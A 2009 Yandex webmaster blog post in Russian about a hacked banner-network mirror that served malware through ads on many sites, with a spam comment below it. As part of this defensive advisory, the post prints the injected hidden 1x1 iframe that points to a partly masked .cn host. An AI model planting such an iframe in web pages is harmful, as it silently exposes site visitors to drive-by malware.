Блог Яндекса для вебмастеров

Про рекламные баннеры и безопасность сайта

16 декабря 2009, 20:02

В очередной раз хочется обратить внимание на проблему безопасности, связанную с размещением на сайтах рекламных материалов. Баннерные сети являются лакомым куском для вирусописателей, так как, внедрив вредоносный код в такую систему, можно автоматически распространить его на множество сайтов. Недавно такое произошло с довольно широко распространенной в Рунете баннерной системой.

При обращении к определенному URL, которое происходит на странице с рекламой, посылается запрос к одному из зеркал баннерной системы, где и располагаются сами рекламные материалы. Одно из зеркал системы было взломано, в результатае чего на нем был размещен вредоносный код.

В итоге всё превращается в определенный http-запрос, в результате которого вызывается

<iframe src="http://www.li******.cn/?id=#" width=1 height=1 frameborder=0></iframe>

Недавно из-за этого довольно много крупных сайтов представляли угрозу для посетителей и были помечены в результатах поиска Яндекса как потенциально опасные.

Подобные атаки, пожалуй, относятся к классу самых неприятных для антивирусных систем. Дело в том, что в зависимости от того, к какому рекламному серверу произойдет запрос, зависит, будет ли страница содержать вредоносный код или нет. Страница начинает "мигать": вредоносный код то есть, то нет. По нашим сведениям на текущий момент неполадки в работе баннерной системы устранены.

В заключение, хотим еще раз напомнить всем веб-мастерам, что следует взять за правило чрезвычайно внимательно относиться ко всем внешним данным, так или иначе использующимся на вашем сайте. И, к сожалению, баннеры не являются исключением из этого правила.


Группа пролетарского гнева компании Яндекс

1 комментарий

А зачем опасаться вирусов у меня воровать нечего? Мне кажется это больше для крупных комерческих организаций. Но есть способ справиться с этой задачей нужно ограничить доступ в интернет на рабочем месте!

http://cat-statey.ru/">Разместить статьи бесплатно